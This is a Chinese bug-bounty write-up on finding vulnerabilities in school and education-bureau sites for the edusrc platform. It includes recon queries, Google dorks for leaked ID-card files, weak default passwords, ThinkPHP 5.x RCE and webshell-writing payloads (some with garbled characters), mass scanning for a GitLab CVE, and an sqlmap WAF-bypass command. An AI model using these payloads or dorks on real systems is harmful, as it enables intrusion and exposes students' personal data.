edusrc挖掘心得

edusrc平臺(tái)介紹

我們可以在關(guān)于頁(yè)面看到edusrc的收錄規(guī)則

現(xiàn)階段，教育行業(yè)漏洞報(bào)告平臺(tái)接收如下類別單位漏洞：

• 教育部

• 各省、自治區(qū)教育廳、直轄市教委、各級(jí)教育局

• 學(xué)校

• 教育相關(guān)軟件

可以看到不僅是大學(xué)的資產(chǎn)、還有小學(xué)初中高中的教育局的也可以交到上面、而資產(chǎn)不僅只有網(wǎng)站，也可以從小程序，app方面入手，不過這方面利用難度就要大一些

一些思路

0x01信息搜集

收集到別人收集不到的資產(chǎn)，就能挖到別人挖不到的洞。

網(wǎng)絡(luò)空間測(cè)繪

奇安信的鷹圖，fofa等

查詢教育資產(chǎn)的語(yǔ)法：domain="edu.cn"表示搜索以edu.cn為結(jié)尾的資產(chǎn)，ip.isp="教育"，表示搜索教育網(wǎng)段的資產(chǎn)，后者的搜索規(guī)模是比前者大很多

子域名搜集

OneForAll 、github知名的子域名收集工具

目前支持一鍵收集：子域、子域常用端口、子域Title、子域狀態(tài)、子域服務(wù)器等

site:***.edu.cn 谷歌語(yǔ)法也可以幫助我們找到一些域名信息

whois反查：

whois反查(知道該注冊(cè)人擁有哪些域名)

電話反查

域名多的情況下，還可以域名批量反查

最后可以把以上工具搜集到的子域名去重就得到了一份完整的大學(xué)網(wǎng)站域名資產(chǎn)，這種做法對(duì)滲透一些證書大學(xué)很有幫助。

學(xué)號(hào)、身份證收集

這里就可以利用谷歌語(yǔ)法搜集

filetype:xls site:xxx.edu 身份證

有時(shí)候運(yùn)氣好就可以搜集到泄露的身份證信息，+1rank(從來沒遇到過)

如果能用這種方法搜集到對(duì)應(yīng)的學(xué)號(hào)身份證，就可以進(jìn)系統(tǒng)測(cè)試了！或者直接連上vpn進(jìn)內(nèi)網(wǎng)上fscan掃描（這里的話可以通過上面說的搜集到的子域名去獲得對(duì)應(yīng)的內(nèi)網(wǎng)ip地址，

指紋識(shí)別

非常有用

谷歌插件wappalyzer：

c段旁站信息

這里我使用這個(gè)工具Cscan，雖然有些小bug但是也是非常推薦的

還有一些在線網(wǎng)站：潮汐指紋

js api接口發(fā)現(xiàn)

這兩個(gè)工具都可以去github下載

jsfind
Packer-Fuzzer（webpack 打包的前端都可以掃一下有驚喜

我的一些騷思路

廢話不多說了

先說一下我感受的挖洞難度：證書大學(xué)站> 資產(chǎn)多的普通大學(xué) > 資產(chǎn)多的職業(yè)學(xué)院 > 有賬號(hào)密碼能進(jìn)內(nèi)網(wǎng)

所以我一開始是去找那種職業(yè)學(xué)院打的，大概是排行榜50多頁(yè)的學(xué)校，可以用鷹圖title="xxxx"進(jìn)行搜集，

因?yàn)橐恍＞W(wǎng)站的安全意識(shí)比較差的，所以有時(shí)候能遇到那種弱口令進(jìn)后臺(tái)文件上傳拿shell的，關(guān)于弱口令：用戶名一般是admin ，密碼一般是123456，admin，888888 三選一，不是的話可以撤退了

弱口令真的yyds

除了弱口令

然后說一下其他思路

比如說think5未開強(qiáng)制路由RCE,這種網(wǎng)站很多大學(xué)都存在，但是尋找thinkphp符和條件的網(wǎng)站卻很難，一種利用鷹圖就是搜索默認(rèn)圖標(biāo)hash值來尋找，但是這種估計(jì)很難撿到，但是在閑逛的過程中看到路由規(guī)則類似thinkphp的可以嘗試一下(靠這個(gè)上了十多rank

一些payload:

5.1.x：

?s=index/	hinkRequest/input&filter[]=system&data=pwd
?s=index/	hinkviewdriverPhp/display&content= phpinfo();?>
?s=index/	hink	emplatedriverfile/write&cacheFile=shell.php&content= phpinfo();?>
?s=index/	hinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.0.x：

?s=index/thinkconfig/get&name=database.username # 獲取配置信息
?s=index/	hinkLang/load&file=../../test.jpg    # 包含任意文件
?s=index/	hinkConfig/load&file=../../t.php     # 包含任意.php文件
?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

寫入 shell

public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../shell.php&vars[1][]=php @eval($_REQUEST[cmd]);?>

然后然后，講一下我一些思路，使用一些Nday來快速上分，或者挖掘邏輯漏洞實(shí)現(xiàn)通殺

關(guān)于Nday這里舉倆個(gè)例子大家自行體會(huì)

比如說你知道有一個(gè)cve 比方說這個(gè)gitlab的cve：gitlab-CVE-2021-22205，gitlab顯而易見的是很多高校都有這個(gè)gitlab的托管網(wǎng)站

所以說我們只要把所有g(shù)itlab edu上的資產(chǎn)全部搜集過來然后利用腳本一一檢測(cè)就了

這里說一下怎么搜集的

**先從圖標(biāo)下手，限定edu域名：可以看到有17條資產(chǎn)

限定ip有27條資產(chǎn)

去除圖標(biāo)的有45條資產(chǎn)

把數(shù)據(jù)全部導(dǎo)出收集到一起，利用github上的腳本進(jìn)行檢測(cè)，這樣就撿到倆個(gè)洞，因?yàn)間itlab這個(gè)cve是可以反彈shell的，所以12rank到手

再說一個(gè)比如說springboot未授權(quán)訪問漏洞：

同上一樣的方法：直接搜java白頁(yè)，把數(shù)據(jù)導(dǎo)出->腳本檢測(cè)

因?yàn)榉秶銐虼笏砸材苡胁恍∈斋@

剩下的可以自己探索，或者有更好的思路可以交流

邏輯漏洞

這里可以使用jsfind腳本去尋找一些js接口，可能會(huì)有未授權(quán)文件上傳，ssrf等等，或者在登錄抓取返回包把false改成true等操作，去實(shí)現(xiàn)登錄繞過，總之來說就是要細(xì)心的閱讀源碼，找接口。

sql注入

尋找注入點(diǎn)方法：site:edu.cn inurl:xxx.php|jsp|asp?xxx= xxx可以自己發(fā)揮想象 ，或者在一些老系統(tǒng)登錄，支付平臺(tái)上都有可能存在注入

但是sql注入大多學(xué)校都上了waf，繞過waf不容易，主要的方法有內(nèi)聯(lián)，分段，以及垃圾字符填充等等

這里舉一個(gè)繞安全狗的例子：

這里原本的參數(shù)是a和b，但是a，b參數(shù)的輸入會(huì)被waf檢測(cè)，通過攔截可以看出是常見的安全狗waf，所以這里可以多添加倆個(gè)參數(shù)：aa，bb（后端不會(huì)接收這兩個(gè)參數(shù)，但是安全狗不會(huì)檢測(cè)注釋里的內(nèi)容，這樣就簡(jiǎn)單繞過了），指定好注入點(diǎn)使用sqlmap輕松拿下。

sqlmap -u "xxx.aspx?aa=/*&a=1&b=2&bb=*/" -p "b" --random-agent